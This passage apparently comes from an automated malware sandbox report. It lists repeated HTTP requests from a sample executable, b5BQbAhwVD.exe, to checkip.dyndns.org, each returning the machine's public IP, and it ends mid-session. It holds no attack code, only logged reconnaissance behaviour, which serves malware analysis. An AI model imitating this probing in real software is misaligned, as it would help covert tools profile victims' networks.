                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
                                                                                                                Jan 10, 2025 22:43:36.955414057 CET127OUTGET / HTTP/1.1
                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                Host: checkip.dyndns.org
                                                                                                                Jan 10, 2025 22:43:37.235462904 CET273INHTTP/1.1 200 OK
                                                                                                                Date: Fri, 10 Jan 2025 21:43:37 GMT
                                                                                                                Content-Type: text/html
                                                                                                                Content-Length: 104
                                                                                                                Connection: keep-alive
                                                                                                                Cache-Control: no-cache
                                                                                                                Pragma: no-cache
                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                1192.168.2.649973132.226.8.169806424C:\Users\user\Desktop\b5BQbAhwVD.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                Jan 10, 2025 22:43:38.457655907 CET127OUTGET / HTTP/1.1
                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                Host: checkip.dyndns.org
                                                                                                                Jan 10, 2025 22:43:39.295414925 CET273INHTTP/1.1 200 OK
                                                                                                                Date: Fri, 10 Jan 2025 21:43:39 GMT
                                                                                                                Content-Type: text/html
                                                                                                                Content-Length: 104
                                                                                                                Connection: keep-alive
                                                                                                                Cache-Control: no-cache
                                                                                                                Pragma: no-cache
                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                2192.168.2.649984132.226.8.169806424C:\Users\user\Desktop\b5BQbAhwVD.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                Jan 10, 2025 22:43:40.418509007 CET151OUTGET / HTTP/1.1
                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                Host: checkip.dyndns.org
                                                                                                                Connection: Keep-Alive
                                                                                                                Jan 10, 2025 22:43:41.236248016 CET273INHTTP/1.1 200 OK
                                                                                                                Date: Fri, 10 Jan 2025 21:43:41 GMT
                                                                                                                Content-Type: text/html
                                                                                                                Content-Length: 104
                                                                                                                Connection: keep-alive
                                                                                                                Cache-Control: no-cache
                                                                                                                Pragma: no-cache
                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                3192.168.2.649991132.226.8.169806424C:\Users\user\Desktop\b5BQbAhwVD.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                Jan 10, 2025 22:43:42.203737974 CET151OUTGET / HTTP/1.1
                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                Host: checkip.dyndns.org
                                                                                                                Connection: Keep-Alive
                                                                                                                Jan 10, 2025 22:43:43.095438004 CET273INHTTP/1.1 200 OK
                                                                                                                Date: Fri, 10 Jan 2025 21:43:42 GMT
                                                                                                                Content-Type: text/html
                                                                                                                Content-Length: 104
                                                                                                                Connection: keep-alive
                                                                                                                Cache-Control: no-cache
                                                                                                                Pragma: no-cache
                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                4192.168.2.649994158.101.44.242806424C:\Users\user\Desktop\b5BQbAhwVD.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                Jan 10, 2025 22:43:44.185894012 CET151OUTGET / HTTP/1.1
                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                Host: checkip.dyndns.org
                                                                                                                Connection: Keep-Alive
                                                                                                                Jan 10, 2025 22:43:44.751507044 CET321INHTTP/1.1 200 OK
                                                                                                                Date: Fri, 10 Jan 2025 21:43:44 GMT
                                                                                                                Content-Type: text/html
                                                                                                                Content-Length: 104
                                                                                                                Connection: keep-alive
                                                                                                                Cache-Control: no-cache
                                                                                                                Pragma: no-cache
                                                                                                                X-Request-ID: ddd3871952a2b3af545697de4da71910
                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                5192.168.2.649996158.101.44.242806424C:\Users\user\Desktop\b5BQbAhwVD.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                Jan 10, 2025 22:43:45.717025042 CET151OUTGET / HTTP/1.1
                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                Host: checkip.dyndns.org
                                                                                                                Connection: Keep-Alive
                                                                                                                Jan 10, 2025 22:43:46.293987989 CET321INHTTP/1.1 200 OK
                                                                                                                Date: Fri, 10 Jan 2025 21:43:46 GMT
                                                                                                                Content-Type: text/html
                                                                                                                Content-Length: 104
                                                                                                                Connection: keep-alive
                                                                                                                Cache-Control: no-cache
                                                                                                                Pragma: no-cache
                                                                                                                X-Request-ID: d3fafd2a6bad22661480c248c7ac5b8b
                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                6192.168.2.649998158.101.44.242806424C:\Users\user\Desktop\b5BQbAhwVD.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                Jan 10, 2025 22:43:47.367672920 CET151OUTGET / HTTP/1.1
                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                Host: checkip.dyndns.org
                                                                                                                Connection: Keep-Alive
                                                                                                                Jan 10, 2025 22:43:47.962541103 CET321INHTTP/1.1 200 OK
                                                                                                                Date: Fri, 10 Jan 2025 21:43:47 GMT
                                                                                                                Content-Type: text/html
                                                                                                                Content-Length: 104
                                                                                                                Connection: keep-alive
                                                                                                                Cache-Control: no-cache
                                                                                                                Pragma: no-cache
                                                                                                                X-Request-ID: 0813f0868eba27acbc1002532db110bd
                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                7192.168.2.650000158.101.44.242806424C:\Users\user\Desktop\b5BQbAhwVD.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                Jan 10, 2025 22:43:48.821504116 CET151OUTGET / HTTP/1.1
                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                Host: checkip.dyndns.org
                                                                                                                Connection: Keep-Alive
                                                                                                                Jan 10, 2025 22:43:49.425270081 CET321INHTTP/1.1 200 OK
                                                                                                                Date: Fri, 10 Jan 2025 21:43:49 GMT
                                                                                                                Content-Type: text/html
                                                                                                                Content-Length: 104
                                                                                                                Connection: keep-alive
                                                                                                                Cache-Control: no-cache
                                                                                                                Pragma: no-cache
                                                                                                                X-Request-ID: b7f4f61ad0b776d6ea41fd4bd434c119
                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                8192.168.2.650002158.101.44.242806424C:\Users\user\Desktop\b5BQbAhwVD.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                Jan 10, 2025 22:43:50.879101992 CET151OUTGET / HTTP/1.1
                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                Host: checkip.dyndns.org
                                                                                                                Connection: Keep-Alive
                                                                                                                Jan 10, 2025 22:43:51.652462006 CET321INHTTP/1.1 200 OK
                                                                                                                Date: Fri, 10 Jan 2025 21:43:51 GMT
                                                                                                                Content-Type: text/html
                                                                                                                Content-Length: 104
                                                                                                                Connection: keep-alive
                                                                                                                Cache-Control: no-cache
                                                                                                                Pragma: no-cache
                                                                                                                X-Request-ID: 79ca9c28536479bb9695e936e9042788
                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                9192.168.2.650004158.101.44.242806424C:\Users\user\Desktop\b5BQbAhwVD.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                Jan 10, 2025 22:43:52.524235964 CET151OUTGET / HTTP/1.1
                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                Host: checkip.dyndns.org
                                                                                                                Connection: Keep-Alive
                                                                                                                Jan 10, 2025 22:43:53.115761995 CET321INHTTP/1.1 200 OK
                                                                                                                Date: Fri, 10 Jan 2025 21:43:53 GMT
                                                                                                                Content-Type: text/html
                                                                                                                Content-Length: 104
                                                                                                                Connection: keep-alive
                                                                                                                Cache-Control: no-cache
                                                                                                                Pragma: no-cache
                                                                                                                X-Request-ID: a3e25d91a915b7c2277532d0830f1961
                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                10192.168.2.650006158.101.44.242806424C:\Users\user\Desktop\b5BQbAhwVD.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                Jan 10, 2025 22:43:53.975125074 CET151OUTGET / HTTP/1.1
                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                Host: checkip.dyndns.org
                                                                                                                Connection: Keep-Alive
                                                                                                                Jan 10, 2025 22:43:54.536262989 CET321INHTTP/1.1 200 OK
                                                                                                                Date: Fri, 10 Jan 2025 21:43:54 GMT
                                                                                                                Content-Type: text/html
                                                                                                                Content-Length: 104
                                                                                                                Connection: keep-alive
                                                                                                                Cache-Control: no-cache
                                                                                                                Pragma: no-cache
                                                                                                                X-Request-ID: ab2b5d3ab0560fb6c82e2162d773295b
                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                11192.168.2.650008158.101.44.242806424C:\Users\user\Desktop\b5BQbAhwVD.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                Jan 10, 2025 22:43:55.409564018 CET151OUTGET / HTTP/1.1
                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                Host: checkip.dyndns.org
                                                                                                                Connection: Keep-Alive
                                                                                                                Jan 10, 2025 22:43:56.009612083 CET321INHTTP/1.1 200 OK
                                                                                                                Date: Fri, 10 Jan 2025 21:43:55 GMT
                                                                                                                Content-Type: text/html
                                                                                                                Content-Length: 104
                                                                                                                Connection: keep-alive
                                                                                                                Cache-Control: no-cache
                                                                                                                Pragma: no-cache
                                                                                                                X-Request-ID: 4238af8b1298dcde61d7c35864183c53
                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                12192.168.2.650010158.101.44.242806424C:\Users\user\Desktop\b5BQbAhwVD.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                Jan 10, 2025 22:43:56.931965113 CET151OUTGET / HTTP/1.1
                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                Host: checkip.dyndns.org
                                                                                                                Connection: Keep-Alive
                                                                                                                Jan 10, 2025 22:43:57.524126053 CET321INHTTP/1.1 200 OK
                                                                                                                Date: Fri, 10 Jan 2025 21:43:57 GMT
                                                                                                                Content-Type: text/html
                                                                                                                Content-Length: 104
                                                                                                                Connection: keep-alive
                                                                                                                Cache-Control: no-cache
                                                                                                                Pragma: no-cache
                                                                                                                X-Request-ID: 5d076ee2331e264afe80a40a2076ab76
                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                13192.168.2.650012158.101.44.242806424C:\Users\user\Desktop\b5BQbAhwVD.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                Jan 10, 2025 22:43:58.712678909 CET151OUTGET / HTTP/1.1
                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                Host: checkip.dyndns.org
                                                                                                                Connection: Keep-Alive
                                                                                                                Jan 10, 2025 22:43:59.291250944 CET321INHTTP/1.1 200 OK
                                                                                                                Date: Fri, 10 Jan 2025 21:43:59 GMT
                                                                                                                Content-Type: text/html
                                                                                                                Content-Length: 104
                                                                                                                Connection: keep-alive
                                                                                                                Cache-Control: no-cache
                                                                                                                Pragma: no-cache
                                                                                                                X-Request-ID: 4abf75da343886fda3ceedd2942b13f1
                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                14192.168.2.650014158.101.44.242806424C:\Users\user\Desktop\b5BQbAhwVD.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                Jan 10, 2025 22:44:00.315828085 CET151OUTGET / HTTP/1.1
                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                Host: checkip.dyndns.org
                                                                                                                Connection: Keep-Alive
                                                                                                                Jan 10, 2025 22:44:00.928858995 CET321INHTTP/1.1 200 OK
                                                                                                                Date: Fri, 10 Jan 2025 21:44:00 GMT
                                                                                                                Content-Type: text/html
                                                                                                                Content-Length: 104
                                                                                                                Connection: keep-alive
                                                                                                                Cache-Control: no-cache
                                                                                                                Pragma: no-cache
                                                                                                                X-Request-ID: 69a7097dc33132be83b18758bf07031b
                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                15192.168.2.650016158.101.44.242806424C:\Users\user\Desktop\b5BQbAhwVD.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                Jan 10, 2025 22:44:01.890877008 CET151OUTGET / HTTP/1.1
                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                Host: checkip.dyndns.org
                                                                                                                Connection: Keep-Alive
                                                                                                                Jan 10, 2025 22:44:02.501419067 CET321INHTTP/1.1 200 OK
                                                                                                                Date: Fri, 10 Jan 2025 21:44:02 GMT
                                                                                                                Content-Type: text/html
                                                                                                                Content-Length: 104
                                                                                                                Connection: keep-alive
                                                                                                                Cache-Control: no-cache
                                                                                                                Pragma: no-cache
                                                                                                                X-Request-ID: c364e5b2ba2a86fafdbb707cbb38eaa1
                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                16192.168.2.650018158.101.44.242806424C:\Users\user\Desktop\b5BQbAhwVD.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                Jan 10, 2025 22:44:03.574836969 CET151OUTGET / HTTP/1.1
                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                Host: checkip.dyndns.org
                                                                                                                Connection: Keep-Alive
                                                                                                                Jan 10, 2025 22:44:04.147130966 CET321INHTTP/1.1 200 OK
                                                                                                                Date: Fri, 10 Jan 2025 21:44:04 GMT
                                                                                                                Content-Type: text/html
                                                                                                                Content-Length: 104
                                                                                                                Connection: keep-alive
                                                                                                                Cache-Control: no-cache
                                                                                                                Pragma: no-cache
                                                                                                                X-Request-ID: 7623266a06b1fbde8ceab673c9f4aad7
                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                17192.168.2.650020158.101.44.242806424C:\Users\user\Desktop\b5BQbAhwVD.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                Jan 10, 2025 22:44:05.147349119 CET151OUTGET / HTTP/1.1
                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                Host: checkip.dyndns.org
                                                                                                                Connection: Keep-Alive
                                                                                                                Jan 10, 2025 22:44:05.755862951 CET321INHTTP/1.1 200 OK
                                                                                                                Date: Fri, 10 Jan 2025 21:44:05 GMT
                                                                                                                Content-Type: text/html
                                                                                                                Content-Length: 104
                                                                                                                Connection: keep-alive
                                                                                                                Cache-Control: no-cache
                                                                                                                Pragma: no-cache
                                                                                                                X-Request-ID: 16fa067ff92ad8bc07ca0ba3536295dc
                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                18192.168.2.650023158.101.44.242806424C:\Users\user\Desktop\b5BQbAhwVD.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                Jan 10, 2025 22:44:06.778987885 CET151OUTGET / HTTP/1.1
                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                Host: checkip.dyndns.org
                                                                                                                Connection: Keep-Alive
                                                                                                                Jan 10, 2025 22:44:07.352101088 CET321INHTTP/1.1 200 OK
                                                                                                                Date: Fri, 10 Jan 2025 21:44:07 GMT
                                                                                                                Content-Type: text/html
                                                                                                                Content-Length: 104
                                                                                                                Connection: keep-alive
                                                                                                                Cache-Control: no-cache
                                                                                                                Pragma: no-cache
                                                                                                                X-Request-ID: 6c34b80ed2c4da75f40aa40427fc7a1a
                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                19192.168.2.650026158.101.44.242806424C:\Users\user\Desktop\b5BQbAhwVD.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                Jan 10, 2025 22:44:08.483690023 CET151OUTGET / HTTP/1.1
                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                Host: checkip.dyndns.org
                                                                                                                Connection: Keep-Alive
